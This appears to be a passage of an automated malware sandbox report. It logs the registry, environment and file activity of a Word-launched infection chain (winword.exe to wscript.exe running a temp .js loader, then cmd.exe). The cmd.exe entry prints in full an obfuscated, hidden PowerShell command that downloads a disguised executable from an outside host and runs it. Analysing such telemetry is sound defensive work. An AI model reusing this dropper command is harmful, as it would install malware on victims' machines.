File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn

Thread 0x76c

35

0

»

Category	Operation	Information	Success	Count	Logfile

Process #12: wscript.exe

136

0

»

Information	Value
ID	#12
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:00:57, Reason: Child Process
Unmonitor	End Time: 00:01:01, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0x178
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A1C 0x 878 0x 57C 0x 4FC 0x 3C4 0x 568 0x 5FC 0x 358 0x 768 0x 610

Threads

Thread 0xa1c

135

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:00 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 128326	1	Fn
System	Get Time	type = Performance Ctr, time = 18234896961	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff430000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 128, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 128, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 128, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 128, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:01 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 128763	1	Fn
System	Get Time	type = Performance Ctr, time = 18278219798	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:01 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 128841	1	Fn
System	Get Time	type = Performance Ctr, time = 18286572546	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	type = size	1	Fn
File	Read	size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:01 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 128934	1	Fn
System	Get Time	type = Performance Ctr, time = 18294679615	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 129153	7	Fn
System	Get Time	type = Ticks, time = 129168	15	Fn
System	Get Time	type = Ticks, time = 129215	7	Fn
System	Get Time	type = Ticks, time = 129246	1	Fn
System	Get Time	type = Ticks, time = 129340	1	Fn
System	Get Time	type = Ticks, time = 129356	2	Fn
System	Get Time	type = Ticks, time = 129371	3	Fn
System	Get Time	type = Ticks, time = 129387	2	Fn
System	Get Time	type = Ticks, time = 129449	1	Fn
System	Get Time	type = Ticks, time = 129558	1	Fn
System	Get Time	type = Ticks, time = 129574	1	Fn
System	Get Time	type = Ticks, time = 129590	1	Fn
System	Get Time	type = Ticks, time = 129714	3	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0x57c

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 6707808		1	Fn

Process #13: cmd.exe

62

0

»

Information	Value
ID	#13
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:00:59, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:25

OS Process Information

»

Information	Value
PID	0x538
Parent PID	0x178 (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 5E0

Threads

Thread 0x5e0

62

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:03 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 130838	1	Fn
System	Get Time	type = Performance Ctr, time = 18493885142	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
